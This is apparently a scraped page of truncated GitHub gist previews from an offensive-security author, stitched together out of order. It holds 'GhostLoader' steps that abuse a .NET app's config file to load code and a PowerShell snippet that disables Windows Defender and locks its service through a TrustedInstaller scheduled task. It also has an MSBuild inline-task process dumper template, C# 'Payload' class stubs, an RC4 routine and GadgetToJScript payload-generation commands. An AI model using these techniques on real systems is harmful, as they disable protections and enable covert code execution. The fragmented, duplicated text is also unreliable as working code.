GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
public class RC4 { | |
public static byte[] Encrypt(byte[] pwd, byte[] data) { | |
int a, i, j, k, tmp; | |
int[] key, box; | |
byte[] cipher; | |
key = new int[256]; | |
box = new int[256]; | |
cipher = new byte[data.Length]; |
#!/bin/bash | |
# store the current dir | |
CUR_DIR=$(pwd) | |
# Let the person running the script know what's going on. | |
echo "\n\033[1mPulling in latest changes for all repositories...\033[0m\n" | |
# Find all git repositories and update it to the master latest revision | |
for i in $(find . -name ".git" | cut -c 3-); do |
Function Calculate-BitcoinKeySpaceBrute() { | |
<# | |
.SYNOPSIS | |
Calculate the number of days to brute force a keyspace with BitCrack given an amount of keys per second "mkeys". | |
May be used to calculate time to crack bitcoin puzzle 32 https://privatekeys.pw/puzzles/bitcoin-puzzle-tx | |
Bitcrack: https://github.com/brichard19/BitCrack | |
Author: Steve Borosh (@rvrsh3ll) | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None |
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
$svc = New-Object -ComObject 'Schedule.Service' | |
$svc.Connect() | |
$user = 'NT SERVICE\TrustedInstaller' | |
$folder = $svc.GetFolder('\') |
using System; | |
using System.IO; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Runtime.InteropServices; | |
using System.Net; | |
using System.IO.Compression; | |
public class Payload | |
{ |
GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildProcDumper.csproj --> | |
<!-- Feel free to use a more aggressive class for testing. --> | |
<Target Name="Hello"> | |
<ClassExample /> | |
</Target> | |
<UsingTask | |
TaskName="ClassExample" | |
TaskFactory="CodeTaskFactory" |
using System; | |
using System.IO; | |
using System.Net; | |
using System.Diagnostics; | |
using System.IO.Compression; | |
using System.Runtime.InteropServices; | |
public class Payload | |
{ | |
public Payload() |
Param([parameter(Mandatory=$true, | |
HelpMessage="Directory to search for .NET Assemblies in.")] | |
$Directory, | |
[parameter(Mandatory=$false, | |
HelpMessage="Whether or not to search recursively.")] | |
[switch]$Recurse = $false, | |
[parameter(Mandatory=$false, | |
HelpMessage="Whether or not to include DLLs in the search.")] | |
[switch]$DLLs = $false, | |
[parameter(Mandatory=$false, |
# Command to generate HTA code using GadgetsToJScript | |
GadgetToJScript.exe -w hta | |
# Command to generate JS code using GadgetsToJScript | |
GadgetToJScript.exe -w js | |
# Command to generate VBS code using GadgetsToJScript | |
GadgetToJScript.exe -w vbs | |
# Command to generate VBA code using GadgetsToJScript |